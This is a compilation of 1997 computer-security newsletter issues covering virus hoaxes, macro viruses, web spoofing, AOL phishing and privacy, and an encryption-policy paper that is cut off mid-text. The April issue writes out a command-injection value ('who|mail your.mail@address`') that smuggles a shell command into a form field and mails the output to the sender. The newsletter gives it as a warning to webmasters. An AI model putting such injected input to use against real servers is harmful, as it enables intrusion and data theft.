Computer Knowledge Newsletter – January 1997 Issue

In This Issue:

  • E-mail viruses and other hoaxes

Virus News

If you have not received a warning about one of several E-mail viruses, just sit back and wait; one will show up sooner or later. At this time, the names include: Good Times, XX-1, Deeyenda, PenPal, Irina, and MMF [Make Money Fast]. Warnings about these “viruses” generally talk about opening and reading E-mail with one of those names in the subject. A variety of nasty things are supposed to happen if you do.

The point to remember is that simply reading a text message cannot damage your computer in any way.

Of course, you should never open any attachment to E-mail without first checking it with an up-to-date scanner. This may involve you changing the setup on your mail program as some come with “open on click” as the default. You should change this so that attachments are saved to a file without automatically opening them. This allows you to check the file before you do anything with it.

For more information about virus myths and hoaxes take a look at:

http://www.kumite.com/myths/ [Now http://www.vmyths.com/Web Link]

Another joke currently circulating consists of a link that claims to be able to examine the contents of your hard drive. When you click on the link you indeed see the contents of your drive and the impression is left that this comes from the site in question. If you look closely at the link, however, you will see that it is nothing more than a direct link to your hard disk: <file:///c|/>. When activated, this link causes your browser to do a directory of your C-drive and present it to you. Nothing gets sent from your computer to the remote site.

New on the Web Site

We’ve established a new general information page at:

http://www.cknow.com/ckinfo/ [Note: URL has changed; and most of the old information removed as being too old and outdated.]

So far there are pages describing web searching, how to handle ZIP files, drive letter assignment, and the answer to the naming argument for Santa’s reindeer (Donder versus Donner). [Don’t ask! – And, that link has been removed due to copyright issues.]

One of the functions of this newsletter will be to announce new pages added to that collection. If you have a particular topic suited to a single page discussion, please let us know and we’ll attempt to construct a page around that topic and then let you know via the newsletter when it’s up.

Our link page has also been updated. The search dialogs from the search engines we use most often have been placed on the page so you can search the net directly from the Computer Knowledge site! (This isn’t particularly difficult to do; if you want the code for your site just “borrow” it from ours by saving the source and then pasting the appropriate portions into your page. The forms we use came directly from the search sites using similar means.)

And, we are pleased to announce an alignment with Amazon.com Books, a premier internet book seller. Some customers have asked for references to books that complement our tutorials. We’ve added a bookstore page to the site to honor this request. You can scroll through the recommended titles and if you see something you like can click on the book’s title and be taken to Amazon.com where you can read further information and place an order at a discounted price. Amazon.com has several secure methods for payment and the book comes straight to your door. You won’t find much easier book purchasing!

In closing: The best of the New Year to everyone.

Computer Knowledge Newsletter – February 1997 Issue

In This Issue:

Virus News

If you are in a corporate environment and run Microsoft Mail you should be interested in a new Word macro virus: ShareFun. The virus checks for MS Mail and, if found, sends a copy of itself to three random people in your personal mailing list. The message has the subject “You have GOT to read this!” and contains no text; just a Word document. The document is the one you are currently working on and is infected so when the receiver opens it in Word they then become infected and the process begins again.

There are two problems with this virus: it appears to have been sent from a “trusted” source, and it sends whatever you are currently working on to the other party (consider what might happen if you are a supervisor working on a termination letter and that draft gets sent to the intended early).

The simple solution is to delete any messages with the indicated subject and only an attachment. (Note: This is different from the so-called “E-mail” viruses where you should delete messages with a particular subject lest you become infected. You cannot get a virus by reading E-mail text. You can get a virus by running an infected attachment, which is the case here. The message is not the problem; the attachment is.)

Add NaughtyRobot to the list of hoax virus alerts. Early in 1997 users started to receive E-mail messages from themselves saying they were “sent to you by NaughtyRobot, an Internet spider that crawls into your server through a tiny hole in the World Wide Web.” The message goes on to tell you your credit card numbers and other information have been captured and that users should alert their ISP, contact the police and a number of other very inconvenient things.

What most people don’t realize is that it’s relatively easy to spoof an E-mail address. So the seed messages started an avalanche and another hoax is born.

The problem here is that something like NaughtyRobot could happen. There are two application add-ons to web browsers that are currently trying for maximum market share: Java and ActiveX. One, Java, was designed from the ground up and has a fair amount of security built in. The second, ActiveX, is based on Microsoft OLE and has little or no real security built in. Microsoft says they are trying to “fix” it but in the meantime an ActiveX application has the power to do any number of nasty things to your computer without your knowledge or permission (a German group has described a method of forcing fund transfers via Quicken using an ActiveX add-on). The only way to be certain at this point in time is to turn ActiveX OFF if your browser supports it. This unfortunately throws the baby out with the bath water, but until the security is properly addressed we’d rather be safe than sorry and suggest you do the same.

In other news, our free virus tutorial has gained significant distribution. It has appeared on the cover CD-ROM for several magazines in the European area for a total distribution of around 400,000. It has also been accepted as part of the standard corporate computer education program at a major computer corporation.

A fairly common theme in the requests for the virus tutorial security DLL has been a search for information on a specific virus because the user is currently infected by that virus. While the security DLL can often reveal more detailed information it is information specifically designed to educate about the virus, not how to remove it. Computer Knowledge does not believe users should attempt to remove viruses without help from an anti-virus program. There are far too many things viruses can do that require highly specialized recovery techniques (e.g., decryption of encrypted data). Recovering by hand requires highly specialized knowledge which anti-virus makers have built into their programs. And, should you have a problem, their technical support people are trained to handle such questions and will often help you even if you are working from just the evaluation version of their software.

If you have a virus, use anti-virus software to rid yourself of it.

General Security

Have a laptop computer and fly? If so, keep reading (actually, keep reading anyhow as the scam described here applies equally well to cameras, luggage, or anything else that looks valuable).

This scam takes place at the magnetic weapon screening port in the terminal. It involves two perps and a mark (that’s you). Perp one goes through the scanner and just hangs around on the other side. The mark approaches the scanner and puts valuable item(s) on the belt to go through the X-ray machine; then heads for the scanner. At this point perp two rushes up and gets ahead of the mark at the scanner. As you might guess, perp two has keys, coins, etc. that set off the alarm and require perp two to back up and clear out pockets. Perp two may have several pockets of things and attempt to go through several times. In the meantime, the mark is held up and the valuables go through the X-ray and are sitting on the other side. At this point perp one ambles up, grabs the valuable item(s) and simply walks off. By the time the mark is through the scanner and realizes something is wrong perp one is gone with the item(s) and perp two is also lost in the crowd.

A few tips to help: Don’t make anything valuable obvious (e.g., stuff your laptop computer into your luggage; don’t carry it in a case that obviously identifies it). At the airport keep everything in sight and don’t let yourself get distracted; if you see someone heading for your items, yell and point (understand when you do this you may get further delayed; security people at airports get suspicious of people who yell, but at least your valuables may be saved). If possible, use the buddy system. One person can carry all the luggage and another can go through first to claim it while the second person transits the detector.

In closing: We wish everyone well. Do stay away from the nasty cold virus that just made its way through our household (hopefully this one won’t travel through E-mail ).

Computer Knowledge Newsletter – March 1997 Issue

In This Issue:

Virus News

No new outstanding viruses to report this month; just the usual increase in (mostly) macro viruses for Microsoft Word.

The anti-virus folks, Dr. Solomon’s, announced they are now monitoring newsgroups. Here are excerpts from their announcement:

  • Internet VirusPatrol is a unique service provided by Dr. Solomon’s to protect users of newsgroups from virus infections. This free service is scanning some 70 usenet newsgroups 24 hours a day 365 days a year.
  • Internet VirusPatrol scans all attached executable files and documents for both known and unknown viruses using Advanced Heuristic Analysis, a technique of scanning files for suspicious code and algorithms. When a virus is found Internet VirusPatrol issues an alert to the newsgroup warning other readers not to download the infected file.

General Security

Most people browsing the web don’t realize that underneath the calm exterior there are a number of security concerns. Many are the concern of service providers but others should be the concern of web site managers and even individuals. Indeed, under the right circumstances and if you are just a bit paranoid you can project a method using cookies that determines when you might be out of town and your home is free for robbing.

The press has mentioned some of the attacks ISPs must counter (e.g., SYN flood, DNS hijacking, Ping o’ Death, IP spoofing, and CGI PHF attacks). What we’d like to discuss this month is something web users might encounter: web spoofing.

A full description of web spoofing can be found at:

http://www.cs.princeton.edu/sip/Web Link

In summary, web spoofing allows a single site to “emulate” the entire web as far as you are concerned. If you were to link to a spoofing site (call it “www.spoof.net” here) then www.spoof.net would fully control all further net activities in your current session. It does this by redirecting all page requests through www.spoof.net and then feeding those pages to you from www.spoof.net. In the process, any requests or information you send out can be intercepted (and changed) by www.spoof.net; and, any information coming back to you through www.spoof.net can likewise be intercepted and/or modified before you see it. So, www.spoof.net doesn’t have to have a copy of the entire web; it only needs to control access to the web and make changes as necessary for its (bad?) purposes.

You should know that this type of redirection is not new. Several sites advertising anonymous surfing have been using this technique for some time now. The difference is that now the bad guys are thinking about using the technique for less than honorable purposes.

But, can’t you just see that the link you are about to click on is going to direct you to http://www.spoof.net/http://www.microsoft.com/ instead of just http://www.microsoft.com? Yes, if you are looking at the link information in your browser and some Javascript script has not taken over that part of the browser screen and is displaying the “real” URL. This is rather easy to do by adding an onmouseover command to your link. Javascript can also mask the URL display in other areas of the screen. Web spoofing can even take place when you’ve selected a secure link and you see the little key icon indicating such a link is in place; you have a secure link to www.spoof.net!

So, what can you do? As much as it grates to keep throwing the baby out with the bathwater, there are only two protections you can use right now: (1) Select the options in your browser to turn Javescript, Java, and ActiveX OFF, and (2) Watch the destination URL for every link you plan to take and make certain they are accurate (e.g., they are not of the form http://www.spoof.net/http://destination.com or http://www.micr0s0ft.com where in the latter case a zero has replaced the oh and you are therefore directed to a place you might not like). When you arrive at a site you trust and that uses Javascript, Java, or ActiveX you can always turn them on and reload that particular page. It’s not a satisfying solution, but the only other solution is to just remain vulnerable.

In another security story, there is a possibility that when ordering from a secure web site you could, potentially, have your credit card and other info passed to a second web site in an unsecured manner. This is true with either Internet Explorer or Netscape as it is a web problem, not a browser problem.

When you fill out a form on a web page and press the submit button the information is first encrypted (if you have a secure connection) and then sent. But, it still remains in a local cache in unencrypted form. If the submit button has been linked to an HTML GET command then it is possible for that information to be automatically sent to the next site you link to from the ordering page in unencrypted form. It would not be sent in a form that would be immediately useful but would reside in that site’s server logs. The problem here is that the server log files are usually not well protected.

The immediate solution would be to have all web page authors use the HTML POST command instead of GET. The information is handled in a different manner and not subject to the above problem.

Fortunately, most authors do use the POST command; but GET is available and it’s not known how many authors have used it.

To be safe, after sending in an order via a secure net connection either don’t link to another site from the secure page or, if you do, manually type in the site location instead of taking an automatic link. This is a minor inconvenience; but best to be safe rather than sorry.

Computer Knowledge Newsletter – April 1997 Issue

In This Issue:

Virus News

There are over 500 macro viruses now. By far, these have quickly become the most widely spread virus problem since viruses were introduced a dozen years ago. There are, however, two ways to virtually guarantee you won’t be infected:

  • Use programs that don’t store macros in the actual data file and/or don’t make macros easy to transmit between computers. Right now, the WordPerfect suite would be the choice (but beware, rumor has it WordPerfect is being changed to store macros in documents; if that happens expect problems with that program as well if they don’t put in anti-virus code).
  • Transmit documents in a format that does not carry macros. I do not open Word documents from anyone else in Word; I read them using the Word Viewer (which does not use macros). If I must edit a Word document from someone else I insist on getting it in Rich Text Format (RTF). This format retains all the formatting but does not store macros. When I transmit documents to others I use RTF as well to show I care. [Update: RTF is capable of directly encoding embedded objects for delivery via that format so if an infected object is embedded into the RTF this format can carry viruses.]

This may seem a bit paranoid, but these simple precautions give great peace of mind and are not at all inconvenient; the translations are transparent.

General Security

If you have a web site or run a server there is a weakness in the CGI scripting that you should be aware of. It involves the backward single quote symbol (`). On many systems UNIX shell commands enclosed in backward single quotes are executed before the command line they are embedded in is executed. The output of the embedded command is then substituted into the original command line and the whole is executed.

Why is this a problem? It’s possible to enter system commands into forms using this technique and hack into systems. One example commonly given would have you enter “who|mail your.mail@address`” into the E-mail address block on a form. When the UNIX server processes the E-mail address response, instead of just noting your address it should run the UNIX who command and then mail the response to you at your E-mail address. In short, you get a list of everyone logged into that UNIX server at that particular time. Of course, other more problematic commands could be used instead.

Before you allow form input to be processed by any of your CGI scripts be certain you strip out any backward quote characters as a precaution.

Miscellaneous

The internet is an interesting place. Logged into mail one day this past month and there, waiting for me, was a message from an Air Force buddy from thirty years ago; long ago lost. You just never know what’s going to pop up from day to day.

For US readers you should be aware that the lawyers have been at it again; but you might get the proverbial “free lunch” because of it.

For some time computer and monitor makers routinely advertised the diagonal on a monitor as the size of the monitor (the same way TV sets are advertised). Some enterprising soul noted that while TV sets have a picture that goes to the edge of the screen, computer monitors do not; they have a typically smaller viewing area due to a mask. This soul was convinced this amounted to false advertising and got a group of lawyers to file a class action suit against many, many monitor and computer makers. A settlement was reached. Some refunds are in order and you may have noted that all ads now say something like xx-inches viewable size.

The long and short of it is that if you purchased a monitor or computer with monitor between 1 May 1991 and 1 May 1995 you are likely entitled to a refund of a portion of your purchase price. How much? If you have not replaced the monitor you get $6. If you replace the monitor between 7 September 1997 and three years from then you can get $13. It looks like there is a $30 limit for any one person as well.

Details have been published in a number of computer publications and are available by calling (800) 789-0311 or visiting the web site:

http://www.computermonitorcases.comWeb Link

Oh yes, in case you were wondering, the legal firm got $5.8 million plus up to another quarter million dollars for actual expenses. Enjoy your $6.

Computer Knowledge Newsletter – May/June 1997 Issue

In This Issue:

Virus News

The AOL4FREE “virus” has gotten a lot of play in the press. Here is a synopsis of the true story. A Macintosh program called AOL4FREE was actually written some time ago. It did what the name implied, broke through AOL login barriers and gave you the service free. The writer was caught. In March of 1997 an AOL4FREE virus hoax started to circulate. Some poorly-brought-up person noticed this, wrote a simple batch file Trojan, called it AOL4FREE.COM, and placed it on some internet sites. The U.S. Department of Energy’s CIAC noticed this and put up a notice that this file was being widely distributed (which it really was not). People got confused and the media did their usual less than outstanding reporting based on this confusion. There is no AOL4FREE virus and warnings about it are a hoax. But, if you ever come upon a program of that name, delete it.

General Security

The May issue of Infosecurity News reports that Microsoft has set up a special E-mail address specifically for reports of security problems relating to its products. The address is secure@microsoft.com and Microsoft has reportedly assigned a “team of experts” to act on reports mailed to that address. Dare we ask how big this team is?

General Information

There may be some hope on the horizon regarding creation of a master “no-spam” list for the internet. The folks at http://www.aristotle.orgWeb Link promise to be close to agreement with Cyber Promotions, Inc. (and other sites which send spam) regarding a master list of those who do not wish unsolicited spam. It’s a step in the right direction, but there are some conditions. First, at the moment they are only taking names from registered voters in the USA. Second, you have to sign up for their service whereby you set up a free account with them and monitor it for mail on subjects you select (they claim to pay you to do this).

Do you live in an area where there are fire ants? If so you should know that they have an attraction to things electrical. In one recorded incident a University of Texas graduate student watched in horror as one of her final papers disappeared off her PowerBook at 2 a.m. one night during her last semester. After calling for technical support she was asked to pull out the battery and note its serial number. When she did, she found it crawling with ants.

For some reason no one yet understands, electrical equipment suits the ants’ needs. Besides horror stories like the-ants-ate-my-homework disaster, tales of Indonesian ants fouling up the works of modems circulate with yarns about Brazilian ants munching on the gel that coats circuit boards. The ants swarm by the thousands inside circuitry, piling up enough debris to break the electrical connection.

It’s reported a year ago, Lynn Heitman installed a newly patented electrical barrier strip which electrocutes ants as they try to crawl into a Mansfield, Texas, streetlight that has the dubious distinction of being the most infested light in the state. So far it appears to be working.

Bottom line: If you live in an area infested with ants, take care they don’t get into your electronic equipment.

New on the Web Site

Most of the work this month has gone into my long-neglected personal pages. I took out the personal links (they were basically the same as the Computer Knowledge links) and have added a travel page. Have been looking through the photo library of late, trying to figure out what to do with it (photos don’t do much good stuck in an envelope in a drawer). So, I’ve started to put small scanned versions of them plus some notes on the internet. If interested, please stop by and visit (if you like it, check back; I’ll be adding more over time).

[Update: These pages are now on my personal domain athttp://tomsdomain.com/Web Link]

Also added to the personal section is a rather complete guide to the rosary, why one should pray it, and how to pray it. Even added some papal encyclicals about the rosary. Try…

[Update: These pages are now on my personal domain athttp://tomsdomain.com/rosary/Web Link]

In closing: Trust everyone has a wonderful summer. Our weather here has been about a month ahead of itself all year and so it’s appropriate to wish everyone a good summer even though it’s still supposed to be spring.

Computer Knowledge Newsletter – June 1997 Issue

In This Issue:

Attention AOL Users

America Online (AOL) and the National Computer Security Association have issued a warning about an array of Trojan Horse programs that can capture passwords from AOL users. The passwords can be sent to various hackers by the Trojan programs. There seems to be a heightened interest in AOL users on the part of the hacker community.

Virus News

Dr. Solomon’s reports a very large surge in new macro viruses over the past month or so. The total count exceeds one thousand now.

There is some good news when you migrate from Word 6 or 7 to Office 97: an entirely new macro language is used in Office 97 (Visual Basic for Applications 5). WordBasic programs won’t directly run under VBA5. Unfortunately, VBA5 attempts to convert any WordBasic programs it encounters. The shipping version does not convert a few named WordBasic macro viruses, but any new viruses not known before Office 97 finished beta testing may very well be automatically converted (not all can be).

And, of course, native VBA5 viruses are possible and exist (e.g., NightShade).

Also multiplying rather rapidly are virus hoaxes. It seems some folks have nothing better to do than think up (or copy) technobabble and put it out as the newest way to get a virus over the internet. Some of the latest include: Matra R-440 Crotale virus, Bud Frogs Screen Saver, the “A MOMENT OF SILENCE..” virus, Join The Crew, Valentine Greeting, Hackingburgh Virus, Yukon3, and, last but not least the Undelivered Mail Virus. This latter is particularly bad because at one time or another almost everyone is going to get a system message that says some E-mail can’t be delivered. These system messages are normal and informational only. Fortunately, the hoax message is almost a direct copy of the old standard hoax, Good Times.

General Security

It’s time for a reminder: BACKUP YOUR DATA!

The need for a proper backup was brought home recently to a friend. This friend had important data on a Bernoulli cartridge and the program to access that data on another cartridge. In some way (we were not able to figure out the exact sequence of events) all files and directories on the cartridge which contained the recovery program were deleted. I was able to recover some of the files and directories but other directories were not available for recovery. The directory files were on the disk but their links to their directory names were lost. By searching the disk I was able to find those directory files and then recover the deleted files in them BUT all the recovered files had to be placed into the root directory of the recovered disk and, worse yet, all of the files had no first letter in their names (DOS replaces the file’s first letter with a special character on delete). It’s likely that even though the files were recovered they won’t be of much use because it will be difficult, if not impossible, to correctly organize and rename.

It’s important to have a backup and, for really critical things, a backup of the backup stored in a different location. This latter, in case some disaster hits your primary backups. And, oh yes, if you use a backup program be certain to include the recovery program for the backups with the backups (you’d be surprised at how many people don’t!).

Do you have an AOL account? If so, do you know that some of the personal information you provided to AOL may be being packaged up and sold to others?

The 9 June 1997 issue of Inter@ctive Week reports that AOL is quietly packaging information it has with information gathered via market research and then selling that package. Can you stop them? According to the article, yes (although it does not say exactly how and I am not an AOL subscriber and so cannot test the techniques). According to the article you have to look two places:

  • Two levels down in the AOL Member Services area there is supposed to be a FAQ, and one of the questions is supposed to address keeping your name off of mailing lists.
  • As far as removing yourself from demographic packages one has to go the the terms-of-service contract. The removal method is supposed to be in the fifth part of the ten that make up the contract.

It’s probably worth trying to find the information if you are an AOL member.

General Information

Do you run a small business or intend to apply for a loan? Be careful about advance-fee loan scams. Companies that advertise themselves as loan “brokers” advertise in hope you will come to them. When you contact them they will pressure you to deal with them for your loan (the pressure usually implies that you must sign up “now” or not get a loan). With a normal broker the fees charged by the broker will usually be taken out of the loan itself and so the broker doesn’t get paid until you get the money. With the scam artist you will be asked for the loan fees up front. The scam is that you pay and then never see the loan money (or your fees despite an often-promised money back guarantee).

In a totally unrelated matter and as much as I dislike “tooting one’s own horn” I’ve got to pass on the following quotes from a recent press release.

Warwick, RI, June 11, 1997 — The Shareware Industry Awards Foundation (SIAF) announced the premiere induction of 52 individuals, companies, and programs in the International Shareware Hall of Fame, a new online pantheon honoring the pioneers in the fast-growing shareware industry. The first year’s inductions were voted by the officers of the SIAF with suggestions through online polling by ‘Net surfers conducted through the popular web site Sharewarejunkies.com.

The 1997 International Hall of Fame inductees are:
[the full list, including…]
Tom Simondi

This was an unexpected honor and I just hope my continued activities will reflect positively on shareware.

In closing: If anyone knows any secrets for growing lemon trees in a coastal region with mild temperatures and rock-hard sandy hardpan soil please let me know via E-mail.

Computer Knowledge Newsletter – July 1997 Issue

In This Issue:

Virus News

The virus world has been fairly quiet over the last month. No new major outbreaks have been reported and no significant new hoaxes have surfaced. Hopefully, the virus and hoax writers are taking their vacation.

If you happen to be in the San Luis Obispo area at 4pm on the 11th of September you might want to tune in to KVEC at AM 920 on the dial. I’m scheduled to discuss computer viruses on a technology show run on that station.

Privacy

Last issue we told you about AOL selling name/address personal information. This month a report surfaced which indicated they planned to add telephone numbers to that. As this is being written the news media report that AOL has now backed away from including telephone numbers due to what is described as very negative feedback from customers. Good work to whomever complained.

You might wonder why AOL has been featured when few on this mailing list have AOL addresses. It’s simple: if one ISP can do these things, others can as well. If privacy is a concern to you then you might want to check with your ISP to see what their policies are. Just a word to the wise.

On another topic, an E-mail request came in relative to various techniques one can use to help with privacy concerns while browsing the web. Two particular techniques were mentioned (anonymous browsing and use of a proxy server). I answered in E-mail but thought that the topic would be interesting in the newsletter.

The idea behind anonymous browsing and, to some extent a proxy server, is that the browser (i.e., you) are better protected from web sites you are visiting finding out about you and your browsing habits. Basically, you request a web page from the anonymous service or proxy server and that site then goes out and gets the information you requested. It then forwards it to you. The result is that the web site with the information knows it’s been visited by the anonymous service or proxy server but has no knowledge of you. The proxy server also advertises that it can speed up your access to the web because, unlike the anonymous browsing service, if the proxy server already has the page you are interested in viewing in its local storage it will serve up that copy to you instead of going out to get a fresh copy. The chances are that your connection to the proxy server is faster overall as that’s typically why you would use one.

While these techniques work to help protect privacy from the web in general, it should be fairly obvious that the anonymous service and/or proxy server can track your requests and compile data about you if they so desire. It’s up to you to decide if you trust the service you use or not.

The other thing to consider with either service is that they can serve as a censor. Some countries, for example, only allow connection to the internet via proxy servers controlled by the government. So, they can not only track your movements on the web, but they can also control what you see by blocking sites or pages that the government thinks you should not see. The same could be applied to private proxy servers you might connect to (and some national internet providers connect you to theirs by default).

This is not to say you should not use these services; they can be valuable and helpful. Just be aware that there are risks as well as benefits.

General Security

The web has much information and many sites. We’ve discussed some protection techniques in past issues but there is one technique that only you can apply, and technology can’t help you. That technique is use of common sense and critical analysis.

There are many web sites you will encounter that purport to give you the whole truth and, for all intents and purposes, look very much like they do. But looks are not sufficient. Just because a site looks like it has valid and useful information does not necessarily mean it does. It’s important to know the source of the information. It’s also important to validate the information as correct.

One example of the type of site where you might want to question what you see would be one of the so-called “hate group” sites (we’re not going to reference any specific site but they are easy to find). These sites present their case in strong terms that often sound reasonable. But, they often share features, no matter who might be the hate target:

  • Paranoia seems to be a main theme. Look for the word “conspiracy.”
  • Often God or religion is cited as justification for whatever is being put forth as truth. (Don’t get me wrong, religion should be an important part of life, but we’ve all seen throughout history how it can be used to justify some fairly nasty things.)
  • Many times some sort of social or economic collapse is predicted. Of course, the target of the hate group will be the cause of the collapse.

Not all sites with bad information will be so obvious. I’ve come upon a number of sites that claim to have virus information and present brief tutorials or articles. Some of these are accurate but most have one or more errors that could get you into trouble. One, for example, indicated that to recover from a virus attack the best thing to do is format your hard disk and restore from backup. While necessary for a very few viruses, it is rare that you have to do this. Taking such advice can lead you to unnecessary work at best and actually do damage at worst.

Bottom line: Use common sense and validate information before trusting anything you find on the web (I’ll add that this goes for books in the library and news from the media as well!).

For an interesting paper on this topic go to the Virus Myths site and look for the paper on False Authority Syndrome. Check at: http://www.kumite.com/myths/ [Reproduced with permission in the CKnow Virus Tutorial]

Another technique being advertised as protection for the user is something called digital certificates. Individuals and companies apply to a central source for a certificate and, when issued, the certificate is supposed to make certain whatever you accept that’s signed is from the person to whom the certificate is issued.

It works, but to put it bluntly, so what? You know the item came from a particular person but that gives you no idea about the security of that item. In short, the certificate doesn’t tell you anything about the person except that s/he presented some sort of identification to the issuing authority. It doesn’t answer the question you want answered: “Can I trust this person with my credit card info (or medical records, or whatever)?”

Look for an eventual move away from certificates identifying a person or company and a move toward certification of types of transactions (i.e., the certificate will guarantee the safety of a particular transaction no matter who is involved in that transaction). The method is still not decided, but the move toward transaction certification and decentralization of the process is already underway in concept.

In closing: Safe computing to everyone.

Computer Knowledge Newsletter – August 1997 Issue

In This Issue:

Virus News

No major virus alerts or hoaxes reported this past month. Some will worry about the Hare virus in September, but it will be mostly hype. One expert says that your chance of seeing the Hare virus is about as good as winning a state lottery with one ticket. Just use any good anti-virus program and ignore the hype.

General Security

You are going to start hearing a lot about technology called “push” if you have not already. Push is supposed to make the internet easier for you by feeding you content based on your desires. This saves you the need to go out and find the news; it will come to you. Just fill out a profile and sit back. PointCast was one of the first push sites and now contains a number of channels you can subscribe to (it’s much like TV). The newest updates of the big two browsers will have push technology built into them, and both Netscape and Microsoft have contracted with multiple providers.

Push isn’t bad. The main problem is that it isn’t any sort of standard. Indeed, most push techniques are hacks of current limited HTML technology with all its flaws. JavaScript and other techniques are used to basically request periodic updates from the server providing the feed. So, basically, in order to receive push material you have to activate those features on your browser–and it’s those features that still have security problems. Keep that in mind when you consider a push source.

Are you the manager of a small or mid-sized network? Secure Computing reports that many companies with small and medium-sized networks “have yet to implement network security solutions.” And, many of these networks are connected to the internet, making them extremely vulnerable. The problem is that most of these networks are managed by non-professional staff and original defaults installed by the maker of the the network software have rarely been changed. Further, security upgrades are often either ignored or not even known about. Two thirds of these networks don’t use any kind of firewall. If you fall into this category, you might want to consider taking another look at your network security.

And, to show you that even the whole internet is vulnerable to rather simple problems, at 2:30am (Eastern) on 17 July an operator keyboard error created a partial blackout of the entire internet, some of which lasted up to 36 hours. Mail was interrupted; some even lost. The problem started when a Network Solutions operator released improperly formatted internet lookup tables for the .COM and .NET domains. While found relatively soon, the bad table had propagated across the internet and the problem could not be resolved until a new table with correct information also propagated across the internet to replace the bad one. At the height of the problem something like 40% of the E-mail bounced or simply went into the bit bucket, never to be seen again. The day before a major fiber cable was cut in Los Angeles and a major power outage took down much of the MAE West internet exchange point for a short time; both causing slow (or no) access for a period. Mid-July was not a good time for the internet.

Yet another bug related to Java and Microsoft has reared its head. Java is supposed to establish a “sandbox” for running applets downloaded from web sites (the sandbox metaphor is used because applets can do what they want within the box but not get outside of it). Apparently, there is a bug in the Microsoft Java Virtual Machines for Windows 3.1, Windows 95, and NT. Under special conditions it seems that a Java applet running in Internet Explorer could access a different internet connection than the one the applet came from and write to your local hard disk (a no-no under Java rules). Microsoft acknowledges the problem but says it only occurs with image files. Other researchers are not so certain. While Microsoft sorts things out, standard caveats apply: turn off all the extra stuff unless you are specifically at a site you know you can trust.

Several newspapers report that subscribers of America Online recently received E-mail apparently from AOL’s chief of Member Services, entitled “Important AOL Information.” The letter is supposed to have given an update on AOL’s efforts to improve its service. At the end was a URL to a letter from AOL Chairman Steve Case, in which readers were asked to give their name, address, home phone, and credit-card number to update AOL’s new computers. As you might expect the link went to a cracker’s database. Bottom line: NEVER give your credit card number (or other important information) to anyone who asks for it if you have not initiated the call or link.

General Information

Last month we talked a bit about hate groups. Early this month, in Germany, a law banning neo-Nazi information and sexually explicit information went into effect. The law penalizes any organization making such material available and any provider that allows it to exist on their system or pass through their system, even if the material originated outside of Germany. It should be interesting to watch this progress.

Year 2000 problems continue to make the news, but as a sign of things to come C|Net has reported that the first lawsuit over problems caused by software not working beyond 1999 has been filed: “Mark Yarsike and Sam Katz, owners of Produce Palace International in Warren, Michigan, said they are tired of losing business due to the problem, and have filed a lawsuit against cash register maker Tec-America and its local service vendor, All American Cash Register Incorporated, seeking $10,000, plus damages, interest, costs, and attorney’s fees. The problem, according to Yarsike and Katz, is that their cash registers cannot recognize the year 2000 as a valid credit card expiration date. They said that between April 30, 1996 and May 6, 1997 their registers crashed 105 times when they attempted to ring up sales billed to credit cards expiring in 2000.”

The credit reporting bureau Experian (formerly TRW Information Systems & Services) started an experiment in selling credit reports over the web. For a fee plus enough private information to identify you the company was willing to make your credit report available to you over a secure internet connection. But, when Experian employees (mostly) started to access the system they suddenly started to get other people’s credit reports. Needless to say, the site was shut down the next day. (Other, less public agencies have been selling such reports over the web and continue to do so.)

Computer Knowledge Newsletter – September 1997 Issue

In This Issue:

Virus News

Two different viruses have started to circulate. So far neither appears to have spread far, but be certain your anti-virus software is up-to-date and able to find these.

Spanska.4250

Dr. Solomon’s (http://www.drsolomon.com) reports that Spanska.4250 is a memory resident polymorphic virus, infecting COM and EXE files. The virus uses stealth to conceal the increase in size of infected files. Some EXE programs fail to run when infected.

If a program infected with Spanska.4250 is run within the first 16 seconds of the 30th minute of any hour (using the system clock) the virus triggers. It displays one of a set of animated text messages, dedicated to a girl named Elvira.

This is one of a number of Spanska variants; but is the only variant which goes memory resident.

Baboon

Dr. Solomon’s (http://www.drsolomon.com) reports that Baboon is a pure boot sector virus which infects the boot sector of floppy disks and the partition sector MBR (Master Boot Record) of hard disks. The virus is caught by booting, or attempting to boot, off an infected floppy disk. It then installs itself in the partition sector.

The Baboon virus has a payload which triggers on the 11th September. On this date the virus overwrites the hard disk MBR (Master Boot Record) and the first 9 sectors of the active (bootable) partition. As well as triggering on the 11th of September the virus can also trigger randomly (albeit infrequently) upon bootup.

To help prevent future infections by pure boot sector viruses Computer Knowledge recommends companies change the CMOS settings of their PCs so they boot from drive C: rather than drive A: by default. This is done using the Setup utility in the BIOS.

General Security

Have you looked around and watched what has been happening on the personal and business security front; particularly with regard to encryption and its availability? If not, you should. Jim Bidzos, President of RSA Data Security, Inc. has prepared an information paper on the bill currently in front of Congress. It’s presented in total below. Remember that RSA sells security products, but this does not necessarily void the points made in the article. The availability of secure encryption is something that everyone should be concerned about. (More information on the subject, including a “Frequently Asked Questions about Cryptography” primer, as well as free personal encryption software with no government access, can be found at www.rsa.comWeb Link.)

The Encryption Debate: Too Much at Stake to Rush to Legislation

Recently, the debate over encryption has intensified. FBI Director Louis Freeh, in his September 3rd testimony before a subcommittee of the Senate Judiciary Committee, sought legislation that would require “key recovery” techniques in all encryption products made and used in the US. The proposed legislation discussed at the hearing is S909, the McCain-Kerry bill, would require that all encryption products manufactured, sold, or used in the US provide on-demand government access with a properly authorized court order.

No one wants to see the FBI stymied in its efforts to do its public safety job. But unfortunately, the debate in the Senate seems to suggest that those opposed to S909 are ignorant of national security concerns, or, worse, willing to put national security at risk for commercial interests. This situation may cause lawmakers to overlook the important issues currently missing from the debate: a clear picture of the potential implications of the legislation the FBI seeks, and identification of safeguards against abuse of a key recovery system.

This debate centers around the use and export of strong encryption (currently, US companies may not freely export products with strong encryption) for use by businesses and individuals to ensure privacy and confidentiality of information in a digital world. Strong encryption is essential in order to conduct business securely and to guard against many forms of espionage, attacks, computer break-ins and theft of information. Strong encryption prevents crime.

However, the same encryption is also seen as a threat to law enforcement and national security concerns. They see it hindering, and possibly preventing them from successfully safeguarding the public from criminals who will use encryption to conceal their activities.

Inside the US, advanced, strong, unescrowed encryption is in use in tens of millions of products, including every browser sold by Netscape and Microsoft, and numerous other products. The international community quickly moved to adopt and deploy encryption, with companies springing up in Germany, South Africa, Ireland, Belgium, Switzerland, and Singapore to exploit opportunities created by US export policy.

